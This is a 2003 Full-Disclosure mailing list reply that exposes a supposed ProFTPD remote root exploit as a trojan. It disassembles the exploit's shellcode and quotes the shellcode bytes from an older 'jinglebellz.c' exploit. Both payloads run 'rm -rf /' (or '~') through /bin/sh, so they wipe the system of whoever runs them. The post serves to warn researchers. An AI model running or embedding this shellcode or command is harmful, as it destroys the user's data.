Re: [Full-Disclosure] ProFTPD-1.2.9rc2 remote root exploit

From: zero (zeroboy_at_arrakis.es)
Date: 10/24/03

  • Next message: Bassett, Mark: "RE: Linux (in)security (Was: Re: [Full-Disclosure] Re: No Subject)"
    To: full-disclosure@lists.netsys.com
    Date: Fri, 24 Oct 2003 21:39:56 +0200
    
    

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    Hmmm, let's see:

    Dump of assembler code for function shellcode:
    0x08049480 <shellcode+0>: xor %eax,%eax
    0x08049482 <shellcode+2>: push %eax
    0x08049483 <shellcode+3>: push $0x582f2066
    0x08049488 <shellcode+8>: push $0x722d206d
    0x0804948d <shellcode+13>: push $0x7258632d
    0x08049492 <shellcode+18>: push $0x41414141
    0x08049497 <shellcode+23>: push $0x41414141
    0x0804949c <shellcode+28>: push $0x41414141
    0x080494a1 <shellcode+33>: push $0x41414141
    0x080494a6 <shellcode+38>: push $0x4368732f
    0x080494ab <shellcode+43>: push $0x6e69622f //
    /bin/shCAAAAAAAAAAAAAAAA/cXrm -rf /X
    0x080494b0 <shellcode+48>: xor %eax,%eax
    0x080494b2 <shellcode+50>: mov %al,0x7(%esp,1)
    0x080494b6 <shellcode+54>: mov %al,0x1a(%esp,1)
    0x080494ba <shellcode+58>: mov %al,0x23(%esp,1)
    0x080494be <shellcode+62>: mov %esp,0x8(%esp,1)
    0x080494c2 <shellcode+66>: xor %ebx,%ebx
    0x080494c4 <shellcode+68>: lea 0x18(%esp,1),%ebx
    0x080494c8 <shellcode+72>: mov %ebx,0xc(%esp,1)
    0x080494cc <shellcode+76>: xor %ebx,%ebx
    0x080494ce <shellcode+78>: lea 0x1b(%esp,1),%ebx
    0x080494d2 <shellcode+82>: mov %ebx,0x10(%esp,1)
    0x080494d6 <shellcode+86>: mov %eax,0x14(%esp,1)
    0x080494da <shellcode+90>: xor %ebx,%ebx
    0x080494dc <shellcode+92>: mov %esp,%ebx
    0x080494de <shellcode+94>: lea 0x8(%esp,1),%ecx
    0x080494e2 <shellcode+98>: xor %edx,%edx
    0x080494e4 <shellcode+100>: lea 0x14(%esp,1),%edx
    0x080494e8 <shellcode+104>: mov $0xb,%al
    0x080494ea <shellcode+106>: int $0x80
    0x080494ec <shellcode+108>: xor %ebx,%ebx
    0x080494ee <shellcode+110>: xor %eax,%eax
    0x080494f0 <shellcode+112>: inc %eax
    0x080494f1 <shellcode+113>: int $0x80
    0x080494f3 <shellcode+115>: add %al,(%eax)
    End of assembler dump.

    Let's give credits to the original c0d3rs of this shellcode. Nobody
    remembers jinglebellz.c?

    <snip>
    /*
                jinglebellz.c - local/remote exploit for mpg123
                (c) 2003 GOBBLES Security seXForces

    [...]

    unsigned char linux_shellcode[] = /* contributed by antiNSA */
             "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x3b\x50\x31\xc0\x68\x6f"
             "\x72\x74\x0a\x68\x6f\x20\x61\x62\x68\x2d\x63\x20\x74\x68\x43"
             "\x54\x52\x4c\x68\x73\x2e\x2e\x20\x68\x63\x6f\x6e\x64\x68\x35"
             "\x20\x73\x65\x68\x20\x69\x6e\x20\x68\x72\x66\x20\x7e\x68\x72"
             "\x6d\x20\x2d\xb3\x02\x89\xe1\xb2\x29\xb0\x04\xcd\x80\x31\xc0"
             "\x31\xff\xb0\x05\x89\xc7\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66"
             "\xba\x70\x50\x52\xb3\x02\x89\xe1\x31\xd2\xb2\x02\xb0\x04\xcd"
             "\x80\x31\xc0\x31\xdb\x31\xc9\x50\x40\x50\x89\xe3\xb0\xa2\xcd"
             "\x80\x4f\x31\xc0\x39\xc7\x75\xd1\x31\xc0\x31\xdb\x31\xc9\x31"
             "\xd2\x68\x66\x20\x7e\x58\x68\x6d\x20\x2d\x72\x68\x2d\x63\x58"
             "\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41\x41\x41"
             "\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f\x62\x69"
             "\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44\x24\x23"
             "\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24\x0c\x31"
             "\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14\x31\xdb"
             "\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0\x0b\xcd"
             "\x80\x31\xdb\x31\xc0\x40\xcd\x80";

    </snip>

    Well well, just a nice copy paste of some of it? :pPpPpPppP

    And the exact cmd is:
    execve("/bin/sh", {"/bin/sh", "-c", "rm -rf /", NULL}, {"rm -rf /", NULL})

    NOTE: In this one ~ is change for a nicer one /

    Have a nice turkey.

    Cheerz

    www.citfi.org
    www.podergeek.com
    **********************************
    "The further backward you look, the further forward you can see" Winston
    Churchill
    "Access is GOD..."

    -----BEGIN PGP SIGNATURE-----
    Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>

    iQA/AwUBP5lx/Q0R8jZM93x8EQJCdwCg9HfcZVDSO8/JCA17lHdkkKT7nKEAn0C6
    l9RpeQ2ZrufRkkV3dflO1dTB
    =kkQd
    -----END PGP SIGNATURE-----

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html


  • Next message: Bassett, Mark: "RE: Linux (in)security (Was: Re: [Full-Disclosure] Re: No Subject)"

    Relevant Pages